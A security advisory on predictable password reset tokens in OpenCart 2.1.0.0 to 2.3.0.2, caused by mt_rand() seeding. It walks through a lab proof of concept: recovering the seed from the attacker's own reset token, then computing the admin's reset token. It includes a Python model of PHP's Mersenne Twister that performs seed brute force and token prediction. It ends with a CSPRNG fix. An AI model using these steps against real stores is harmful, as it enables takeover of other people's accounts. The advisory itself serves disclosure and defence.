SSD Advisory – OpenCart Account Takeover

Credit to Author: Maor Schwartz | Date: Sun, 26 Mar 2017 13:14:58 +0000

Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom

Vulnerability Summary
The following advisory describes an account takeover vulnerability found in OpenCart (version 2.3.0.2). OpenCart is an open-source e-commerce platform written in PHP.

“Opencart is an easy-to-use, powerful, Open Source online store management program that can manage multiple online stores from a single back-end.”

Credit
An independent security researcher “Ayrx” has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor Responses
The vendor had this response to our report:
“… another clown acting like james bond with a nonsense Vulnerability”
“james already told me it was bullshit so go ahead!”

Vulnerability Details

OpenCart versions 2.1.0.0 up to and including the latest release, 2.3.0.2, contain a token() function that generates tokens using PHP’s mt_rand() function.

PHP’s mt_rand() is based on the Mersenne Twister PRNG (MT19937), which is not cryptographically secure: its entire state is derived from a 32-bit seed that is set once per process, so the seed, and with it every past and future output, can be recovered by brute force from a handful of observed outputs.

In particular, token() is used to generate password reset tokens, which turns the predictable output into an account takeover vulnerability.

Proof of Concept
The described proof of concept requires OpenCart to be running in a fresh PHP process. This is because PHP seeds mt_rand() only once per process (automatically, on the first call), so the attacker’s token has to be the first draws from that seed for a single token to be enough to recover it.

The scripts used are in the Exploit Scripts section of the report.

Initial setup:

  1. Download OpenCart v2.3.0.2 from here
  2. Extract the files and rename config-dist.php and admin/config-dist.php to config.php and admin/config.php
  3. Run the following command “php -S 0.0.0.0:8000” from the upload/ folder
  4. Continue the installation through the web interface (‘127.0.0.1:8000’ for example) – Follow the installation guide
  5. Register an account that belongs to the “attacker”. In this Proof of Concept the attacker’s email is ‘foo@abc.com’, and admin@abc.com belongs to the account you want to take over

Attack:

  1. Download and compile php_mt_seed v3.2.
  2. Send a password reset request for the attacker-controlled email account
  3. Send a password reset request for the account you want to take over
  4. Find the password reset token sent to foo@abc.com
  5. Run “python Convert_token.py TOKEN”
  6. Run ./php_mt_seed with the output of Convert_token.py
  7. Edit the $seed variable in Generate.php with the seed discovered by php_mt_seed
  8. Run the following command “php Generate.php” to discover the password reset token of admin@abc.com
  9. Go to “localhost:8000/admin/index.php?route=common/reset&code=CODE” with CODE replaced by the output of Generate.php
  10. We have now taken over the admin account by resetting its password!

Once again, this Proof of Concept requires that the password reset requests be processed by a fresh PHP process (or a PHP process that has not called mt_rand() before).
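The following Python model walks through the attack above end to end. It is an added example, not the advisory’s Convert_token.py or Generate.php and not OpenCart code. PhpMtRand follows PHP’s mt_rand() as I read ext/standard/mt_rand.c: standard MT19937 seeding and tempering, with a `legacy` switch for PHP 5.2.1 to 7.0 (the twist bit taken from the wrong word during reload, and a 31-bit draw scaled with doubles) versus PHP 7.1+ in its default mode; which one the target runs decides `legacy`. Assumptions are marked in the code: the alphabet order and default length 32 of OpenCart’s token(), the php_mt_seed input format, and a seed space cut down to 2^12 so the brute force finishes in seconds (php_mt_seed covers all 2^32 seeds in C). The attacker’s and victim’s tokens are constructed in demo() from one simulated fresh process.

```python
import secrets
import string

# Assumed to match OpenCart's token(): 62 symbols, picked by index with mt_rand(0, 61).
ALPHABET = string.ascii_lowercase + string.ascii_uppercase + string.digits


class PhpMtRand:
    """MT19937 driven the way PHP does it: mt_srand(seed), then mt_rand(min, max).
    legacy=True follows PHP 5.2.1 to 7.0 (wrong twist bit in reload, double-based
    range scaling of a 31-bit draw); legacy=False follows PHP >= 7.1 default mode."""

    N, M = 624, 397

    def __init__(self, seed, legacy=True):
        self.legacy = legacy
        mt = [seed & 0xFFFFFFFF]                     # standard init_genrand()
        for i in range(1, self.N):
            mt.append((1812433253 * (mt[-1] ^ (mt[-1] >> 30)) + i) & 0xFFFFFFFF)
        self.mt, self.idx = mt, self.N

    def _reload(self):
        mt, N, M = self.mt, self.N, self.M
        for i in range(N):
            u, v = mt[i], mt[(i + 1) % N]
            y = (u & 0x80000000) | (v & 0x7FFFFFFF)
            lo = (u if self.legacy else v) & 1       # PHP < 7.1 takes the bit from u
            mt[i] = mt[(i + M) % N] ^ (y >> 1) ^ (0x9908B0DF if lo else 0)
        self.idx = 0

    def _u32(self):
        """One tempered 32-bit output (PHP's internal php_mt_rand())."""
        if self.idx >= self.N:
            self._reload()
        y = self.mt[self.idx]
        self.idx += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        return (y ^ (y >> 18)) & 0xFFFFFFFF

    def mt_rand(self, lo, hi):
        if self.legacy:
            n = self._u32() >> 1                     # userland mt_rand() is 31-bit
            return lo + int((hi - lo + 1.0) * (n / 2147483648.0))
        umax = hi - lo
        r = self._u32()
        if umax == 0xFFFFFFFF:
            return lo + r
        umax += 1
        if umax & (umax - 1) == 0:                   # power of two: mask, no bias
            return lo + (r & (umax - 1))
        limit = 0xFFFFFFFF - (0xFFFFFFFF % umax) - 1
        while r > limit:                             # reject to avoid modulo bias
            r = self._u32()
        return lo + r % umax


def opencart_token(rng, length=32):
    """OpenCart-style token(): one mt_rand(0, 61) alphabet index per character
    (length 32 is the assumed default of OpenCart's token())."""
    return "".join(ALPHABET[rng.mt_rand(0, len(ALPHABET) - 1)] for _ in range(length))


def token_constraints(token):
    """Convert_token.py's job: per mt_rand() call, the observed value (exact, so
    min == max) and its range. Assumed php_mt_seed format: VMIN VMAX RMIN RMAX."""
    return [(ALPHABET.index(c), ALPHABET.index(c), 0, len(ALPHABET) - 1) for c in token]


def recover_seed(token, legacy=True, max_seed=1 << 12):
    """php_mt_seed's job: brute-force the mt_srand() seed whose first draws
    reproduce `token`. max_seed is a demo-size cut of the real 2**32 space."""
    want = [ALPHABET.index(c) for c in token]
    for seed in range(max_seed):
        rng = PhpMtRand(seed, legacy)
        if all(rng.mt_rand(0, 61) == w for w in want):   # stops at first mismatch
            return seed
    return None


def predict_token(seed, tokens_already_issued, legacy=True):
    """Generate.php's job: replay the process from the seed, skip the tokens the
    server already handed out (the attacker's own), return the next one."""
    rng = PhpMtRand(seed, legacy)
    for _ in range(tokens_already_issued + 1):
        token = opencart_token(rng)
    return token


def demo(secret_seed, legacy=True):
    """Constructed run of the PoC: fresh process, attacker resets first, victim
    second. Returns (recovered seed, whether the victim's token was predicted)."""
    server = PhpMtRand(secret_seed, legacy)
    attacker_token = opencart_token(server)          # mailed to foo@abc.com
    victim_token = opencart_token(server)            # mailed to admin@abc.com, unseen
    seed = recover_seed(attacker_token, legacy)
    return seed, seed is not None and predict_token(seed, 1, legacy) == victim_token


def safe_token(nbytes=32):
    """The fix: a CSPRNG. In PHP, bin2hex(random_bytes(32)) or random_int() per char."""
    return secrets.token_hex(nbytes)
```

demo(1337) recovers seed 1337 from the attacker’s token alone and reproduces the victim’s token, which is exactly what steps 4 to 8 do against a real instance; the only difference is that php_mt_seed has to walk the whole 32-bit seed space, which is why it is written in C rather than Python. safe_token() shows why the fix is a CSPRNG and not a longer token: a 32-character mt_rand() token carries about 190 bits of output but only 32 bits of secret, while random_bytes() has no seed to recover.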

Exploit Scripts

Convert_token.py

Generate.php

Untwister
When OpenCart has been running for some time, mt_rand() has already produced an unknown number of outputs before the attacker’s token, so a single token is no longer enough to deduce the state (and with it the next token that will be generated). To make life easier a tool called Untwister has been built. Using Untwister, an attacker can feed in multiple tokens they have recovered and predict the next tokens that OpenCart will generate.

More details on Untwister can be found here: https://www.bishopfox.com/blog/2014/08/untwisting-mersenne-twister-killed-prng/.
